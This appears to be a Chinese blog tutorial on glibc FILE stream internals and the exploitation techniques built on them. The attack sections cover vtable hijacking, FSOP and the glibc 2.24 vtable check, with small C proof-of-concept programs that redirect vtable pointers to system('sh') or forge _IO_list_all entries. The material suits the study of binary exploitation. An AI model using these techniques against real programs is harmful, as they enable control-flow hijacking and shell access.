IO-FILE相关

FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中。

FILE结构

定义一个指向 FILE 结构的指针来接收这个返回值。FILE 结构定义在 libio.h 中,如下所示

struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

进程中的 FILE 结构会通过_chain 域彼此连接形成一个链表,链表头部用全局变量_IO_list_all 表示,通过这个值我们可以遍历所有的 FILE 结构。

在标准 I/O 库中,每个程序启动时有三个文件流是自动打开的:stdin、stdout、stderr。因此在初始状态下,_IO_list_all 指向了一个有这些文件流构成的链表,但是需要注意的是这三个文件流位于 libc.so 的数据段。而我们使用 fopen 创建的文件流是分配在堆内存上的。

我们可以在 libc.so 中找到 stdin\stdout\stderr 等符号,这些符号是指向 FILE 结构的指针,真正结构的符号是:

_IO_2_1_stderr_
_IO_2_1_stdout_
_IO_2_1_stdin_

但是事实上_IO_FILE 结构外包裹着另一种结构_IO_FILE_plus,其中包含了一个重要的指针 vtable 指向了一系列函数指针。

在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8

struct _IO_FILE_plus
{
_IO_FILE file;
IO_jump_t *vtable;
}

vtable 是 IO_jump_t 类型的指针,IO_jump_t 中保存了一些函数指针,在后面我们会看到在一系列标准 IO 函数中会调用这些函数指针:

void * funcs[] = {
1 NULL, // "extra word"
2 NULL, // DUMMY
3 exit, // finish
4 NULL, // overflow
5 NULL, // underflow
6 NULL, // uflow
7 NULL, // pbackfail

8 NULL, // xsputn #printf
9 NULL, // xsgetn
10 NULL, // seekoff
11 NULL, // seekpos
12 NULL, // setbuf
13 NULL, // sync
14 NULL, // doallocate
15 NULL, // read
16 NULL, // write
17 NULL, // seek
18 pwn, // close
19 NULL, // stat
20 NULL, // showmanyc
21 NULL, // imbue
};

相关函数

fread

fread 是标准 IO 库函数,作用是从文件流中读数据,函数原型如下:

size_t fread ( void *buffer, size_t size, size_t count, FILE *stream) ;
  • buffer 存放读取数据的缓冲区。
  • size:指定每个记录的长度。
  • count: 指定记录的个数。
  • stream:目标文件流。
  • 返回值:返回读取到数据缓冲区中的记录个数

fread 的代码位于 / libio/iofread.c 中,函数名为\_IO_fread,但真正的功能实现在子函数_IO_sgetn 中。

_IO_size_t
_IO_fread (buf, size, count, fp)
void *buf;
_IO_size_t size;
_IO_size_t count;
_IO_FILE *fp;
{
...
bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested);
...
}

\_IO_sgetn 函数中会调用\_IO_XSGETN,而\_IO_XSGETN_IO_FILE_plus.vtable 中的函数指针,在调用这个函数时会首先取出 vtable 中的指针然后再进行调用。

_IO_size_t
_IO_sgetn (fp, data, n)
_IO_FILE *fp;
void *data;
_IO_size_t n;
{
return _IO_XSGETN (fp, data, n);
}

在默认情况下函数指针是指向_IO_file_xsgetn 函数的

if (fp->_IO_buf_base
&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;

continue;
}

fwrite

fwrite 同样是标准 IO 库函数,作用是向文件流写入数据,函数原型如下

size_t fwrite(const void* buffer, size_t size, size_t count, FILE* stream);
  • buffer: 是一个指针,对 fwrite 来说,是要写入数据的地址;
  • size: 要写入内容的单字节数;
  • count: 要进行写入 size 字节的数据项的个数;
  • stream: 目标文件指针;
  • 返回值:实际写入的数据项个数 count。

fwrite 的代码位于 /libio/iofwrite.c 中,函数名为\_IO_fwrite。 在_IO_fwrite 中主要是调用_IO_XSPUTN 来实现写入的功能。

根据前面对\_IO_FILE_plus 的介绍,可知\_IO_XSPUTN 位于_IO_FILE_plus 的 vtable 中,调用这个函数需要首先取出 vtable 中的指针,再跳过去进行调用。

written = _IO_sputn (fp, (const char *) buf, request);

\_IO_XSPUTN 对应的默认函数\_IO_new_file_xsputn 中会调用同样位于 vtable 中的_IO_OVERFLOW

/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)

\_IO_OVERFLOW 默认对应的函数是_IO_new_file_overflow

if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
if (_IO_do_flush (f) == EOF)
return EOF;

在_IO_new_file_overflow 内部最终会调用系统接口 write 函数。

fopen

fopen 在标准 IO 库中用于打开文件,函数原型如下

FILE *fopen(char *filename, *type);
  • filename: 目标文件的路径
  • type: 打开方式的类型
  • 返回值: 返回一个文件指针

在 fopen 内部会创建 FILE 结构并进行一些初始化操作,下面来看一下这个过程

首先在 fopen 对应的函数_fopen_internal 内部会调用 malloc 函数,分配 FILE 结构的空间。因此我们可以获知 FILE 结构是存储在堆上的

*new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));

之后会为创建的 FILE 初始化 vtable,并调用_IO_file_init 进一步初始化操作

_IO_JUMPS (&new_f->fp) = &_IO_file_jumps;
_IO_file_init (&new_f->fp);

在_IO_file_init 函数的初始化操作中,会调用_IO_link_in 把新分配的 FILE 链入_IO_list_all 为起始的 FILE 链表中

void
_IO_link_in (fp)
struct _IO_FILE_plus *fp;
{
if ((fp->file._flags & _IO_LINKED) == 0)
{
fp->file._flags |= _IO_LINKED;
fp->file._chain = (_IO_FILE *) _IO_list_all;
_IO_list_all = fp;
++_IO_list_all_stamp;
}
}

之后_fopen_internal 函数会调用_IO_file_fopen 函数打开目标文件,_IO_file_fopen 会根据用户传入的打开模式进行打开操作,总之最后会调用到系统接口 open 函数,这里不再深入。

if (_IO_file_fopen ((_IO_FILE *) new_f, filename, mode, is32) != NULL)
return __fopen_maybe_mmap (&new_f->fp.file);

总结一下 fopen 的操作是

  • 使用 malloc 分配 FILE 结构
  • 设置 FILE 结构的 vtable
  • 初始化分配的 FILE 结构
  • 将初始化的 FILE 结构链入 FILE 结构链表中
  • 调用系统调用打开文件

fclose

fclose 是标准 IO 库中用于关闭已打开文件的函数,其作用与 fopen 相反。

int fclose(FILE *stream)

功能:关闭一个文件流,使用 fclose 就可以把缓冲区内最后剩余的数据输出到磁盘文件中,并释放文件指针和有关的缓冲区

fclose 首先会调用_IO_unlink_it 将指定的 FILE 从_chain 链表中脱链

if (fp->_IO_file_flags & _IO_IS_FILEBUF)
_IO_un_link ((struct _IO_FILE_plus *) fp);

之后会调用_IO_file_close_it 函数,_IO_file_close_it 会调用系统接口 close 关闭文件

if (fp->_IO_file_flags & _IO_IS_FILEBUF)
status = _IO_file_close_it (fp);

最后调用 vtable 中的_IO_FINISH,其对应的是_IO_file_finish 函数,其中会调用 free 函数释放之前分配的 FILE 结构

_IO_FINISH (fp);

printf/puts

printf 和 puts 是常用的输出函数,在 printf 的参数是以\n结束的纯字符串时,printf 会被优化为 puts 函数并去除换行符。

puts 在源码中实现的函数是_IO_puts,这个函数的操作与 fwrite 的流程大致相同,函数内部同样会调用 vtable 中的_IO_sputn,结果会执行_IO_new_file_xsputn,最后会调用到系统接口 write 函数。

printf 的调用栈回溯如下,同样是通过_IO_file_xsputn 实现

vfprintf+11
_IO_file_xsputn
_IO_file_overflow
funlockfile
_IO_file_write
write

下面记录一些攻击技术。

伪造 vtable 劫持程序流程

简介

前面我们介绍了 Linux 中文件流的特性(FILE),我们可以得知 Linux 中的一些常见的 IO 操作函数都需要经过 FILE 结构进行处理。尤其是_IO_FILE_plus 结构中存在 vtable,一些函数会取出 vtable 中的指针进行调用。

因此伪造 vtable 劫持程序流程的中心思想就是针对_IO_FILE_plus 的 vtable 动手脚,通过把 vtable 指向我们控制的内存,并在其中布置函数指针来实现。

因此 vtable 劫持分为两种,一种是直接改写 vtable 中的函数指针,通过任意地址写就可以实现。另一种是覆盖 vtable 的指针指向我们控制的内存,然后在其中布置函数指针。

示例

这里演示了修改 vtable 中的指针,首先需要知道_IO_FILE_plus 位于哪里,对于 fopen 的情况是位于堆内存,对于 stdin\stdout\stderr 是位于 libc.so 中。

int main(void)
{
FILE *fp;
long long *vtable_ptr;
fp=fopen("123.txt","rw");
vtable_ptr=*(long long*)((long long)fp+0xd8); //get vtable

vtable_ptr[7]=0x41414141 //xsputn

printf("call 0x41414141");
}

根据 vtable 在_IO_FILE_plus 的偏移得到 vtable 的地址,在 64 位系统下偏移是 0xd8。之后需要搞清楚欲劫持的 IO 函数会调用 vtable 中的哪个函数。关于 IO 函数调用 vtable 的情况已经在 FILE 结构介绍一节给出了,知道了 printf 会调用 vtable 中的 xsputn,并且 xsputn 是 vtable 中的第八项之后就可以写入这个指针进行劫持。

并且在 xsputn 等 vtable 函数进行调用时,传入的第一个参数其实是对应的_IO_FILE_plus 地址。比如这例子调用 printf,传递给 vtable 的第一个参数就是_IO_2_1_stdout_的地址。

利用这点可以实现给劫持的 vtable 函数传參,比如:

#define system_ptr 0x7ffff7a52390;

int main(void)
{
FILE *fp;
long long *vtable_ptr;
fp=fopen("123.txt","rw");
vtable_ptr=*(long long*)((long long)fp+0xd8); //get vtable

memcopy(fp,"sh",3);

vtable_ptr[7]=system_ptr //xsputn


fwrite("hi",2,1,fp);
}

但是在目前 libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的。不过,通过在可控的内存中伪造 vtable 的方法依然可以实现利用。

#define system_ptr 0x7ffff7a52390;

int main(void)
{
FILE *fp;
long long *vtable_addr,*fake_vtable;

fp=fopen("123.txt","rw");
fake_vtable=malloc(0x40);

vtable_addr=(long long *)((long long)fp+0xd8); //vtable offset

vtable_addr[0]=(long long)fake_vtable;

memcpy(fp,"sh",3);

fake_vtable[7]=system_ptr; //xsputn

fwrite("hi",2,1,fp);
}

我们首先分配一款内存来存放伪造的 vtable,之后修改_IO_FILE_plus 的 vtable 指针指向这块内存。因为 vtable 中的指针我们放置的是 system 函数的地址,因此需要传递参数 “/bin/sh” 或 “sh”。

因为 vtable 中的函数调用时会把对应的_IO_FILE_plus 指针作为第一个参数传递,因此这里我们把 “sh” 写入_IO_FILE_plus 头部。之后对 fwrite 的调用就会经过我们伪造的 vtable 执行 system(“sh”)。

同样,如果程序中不存在 fopen 等函数创建的_IO_FILE 时,也可以选择 stdin\stdout\stderr 等位于 libc.so 中的_IO_FILE,这些流在 printf\scanf 等函数中就会被使用到。在 libc2.23 之前,这些 vtable 是可以写入并且不存在其他检测的。

print &_IO_2_1_stdin_
$2 = (struct _IO_FILE_plus *) 0x7ffff7dd18e0 <_IO_2_1_stdin_>

0x00007ffff7a0d000 0x00007ffff7bcd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so

FSOP

简介

FSOP 是 File Stream Oriented Programming 的缩写,根据前面对 FILE 的介绍得知进程内所有的_IO_FILE 结构会使用_chain 域相互连接形成一个链表,这个链表的头部由_IO_list_all 维护。

FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。

int
_IO_flush_all_lockp (int do_lock)
{
...
fp = (_IO_FILE *) _IO_list_all;
while (fp != NULL)
{
...
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base))
&& _IO_OVERFLOW (fp, EOF) == EOF)
{
result = EOF;
}
...
}
}

而_IO_flush_all_lockp 不需要攻击者手动调用,在一些情况下这个函数会被系统调用:

  • 1、当 libc 执行 abort 流程时
  • 2、当执行 exit 函数时
  • 3、当执行流从 main 函数返回时

示例

梳理一下 FSOP 利用的条件,首先需要攻击者获知 libc.so 基址,因为_IO_list_all 是作为全局变量储存在 libc.so 中的,不泄漏 libc 基址就不能改写_IO_list_all。

之后需要用任意地址写把_IO_list_all 的内容改为指向我们可控内存的指针,

之后的问题是在可控内存中布置什么数据,毫无疑问的是需要布置一个我们理想函数的 vtable 指针。但是为了能够让我们构造的 fake_FILE 能够正常工作,还需要布置一些其他数据。 这里的依据是我们前面给出的

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base))
&& _IO_OVERFLOW (fp, EOF) == EOF)
{
result = EOF;
}

也就是:

  • fp->_mode <= 0
  • fp->_IO_write_ptr > fp->_IO_write_base

在这里通过一个示例来验证这一点,首先我们分配一块内存用于存放伪造的 vtable 和_IO_FILE_plus。 为了绕过验证,我们提前获得了_IO_write_ptr、_IO_write_base、_mode 等数据域的偏移,这样可以在伪造的 vtable 中构造相应的数据

#define _IO_list_all 0x7ffff7dd2520
#define mode_offset 0xc0
#define writeptr_offset 0x28
#define writebase_offset 0x20
#define vtable_offset 0xd8

int main(void)
{
void *ptr;
long long *list_all_ptr;

ptr=malloc(0x200);

*(long long*)((long long)ptr+mode_offset)=0x0;
*(long long*)((long long)ptr+writeptr_offset)=0x1;
*(long long*)((long long)ptr+writebase_offset)=0x0;
*(long long*)((long long)ptr+vtable_offset)=((long long)ptr+0x100);

*(long long*)((long long)ptr+0x100+24)=0x41414141;

list_all_ptr=(long long *)_IO_list_all;

list_all_ptr[0]=ptr;

exit(0);
}

我们使用分配内存的前 0x100 个字节作为_IO_FILE,后 0x100 个字节作为 vtable,在 vtable 中使用 0x41414141 这个地址作为伪造的_IO_overflow 指针。

之后,覆盖位于 libc 中的全局变量 _IO_list_all,把它指向我们伪造的_IO_FILE_plus。

通过调用 exit 函数,程序会执行 _IO_flush_all_lockp,经过 fflush 获取_IO_list_all 的值并取出作为_IO_FILE_plus 调用其中的_IO_overflow

---> call _IO_overflow
[#0] 0x7ffff7a89193 → Name: _IO_flush_all_lockp(do_lock=0x0)
[#1] 0x7ffff7a8932a → Name: _IO_cleanup()
[#2] 0x7ffff7a46f9b → Name: __run_exit_handlers(status=0x0, listp=<optimized out>, run_list_atexit=0x1)
[#3] 0x7ffff7a47045 → Name: __GI_exit(status=<optimized out>)
[#4] 0x4005ce → Name: main()

glibc 2.24 下 IO_FILE 的利用

在 2.24 版本的 glibc 中,全新加入了针对 IO_FILE_plus 的 vtable 劫持的检测措施,glibc 会在调用虚函数之前首先检查 vtable 地址的合法性。首先会验证 vtable 是否位于_IO_vtable 段中,如果满足条件就正常执行,否则会调用_IO_vtable_check 做进一步检查。

/* Check if unknown vtable pointers are permitted; otherwise,
terminate the process. */
void _IO_vtable_check (void) attribute_hidden;
/* Perform vtable pointer validation. If validation fails, terminate
the process. */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}

计算 section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;,紧接着会判断 vtable - __start___libc_IO_vtables 的 offset ,如果这个 offset 大于 section_length , 即大于 __stop___libc_IO_vtables - __start___libc_IO_vtables 那么就会调用 _IO_vtable_check() 这个函数。

void attribute_hidden
_IO_vtable_check (void)
{
#ifdef SHARED
/* Honor the compatibility flag. */
void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (flag);
#endif
if (flag == &_IO_vtable_check)
return;

/* In case this libc copy is in a non-default namespace, we always
need to accept foreign vtables because there is always a
possibility that FILE * objects are passed across the linking
boundary. */
{
Dl_info di;
struct link_map *l;
if (_dl_open_hook != NULL
|| (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0
&& l->l_ns != LM_ID_BASE))
return;
}

#else /* !SHARED */
/* We cannot perform vtable validation in the static dlopen case
because FILE * handles might be passed back and forth across the
boundary. Therefore, we disable checking in this case. */
if (__dlopen != NULL)
return;
#endif

__libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}

如果 vtable 是非法的,那么会引发 abort。

这里的检查使得以往使用 vtable 进行利用的技术很难实现,不过存在新的利用技术。

fileno 与缓冲区的相关利用

在 vtable 难以被利用之后,利用的关注点从 vtable 转移到_IO_FILE 结构内部的域中。 前面介绍过_IO_FILE 在使用标准 IO 库时会进行创建并负责维护一些相关信息,其中有一些域是表示调用诸如 fwrite、fread 等函数时写入地址或读取地址的,如果可以控制这些数据就可以实现任意地址写或任意地址读。

struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;
int _flags2;
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
};

因为进程中包含了系统默认的三个文件流 stdin\stdout\stderr,因此这种方式可以不需要进程中存在文件操作,通过 scanf\printf 一样可以进行利用。

在_IO_FILE 中_IO_buf_base 表示操作的起始地址,_IO_buf_end 表示结束地址,通过控制这两个数据可以实现控制读写的操作。

Comments


:D 一言句子获取中...

Loading...Wait a Minute!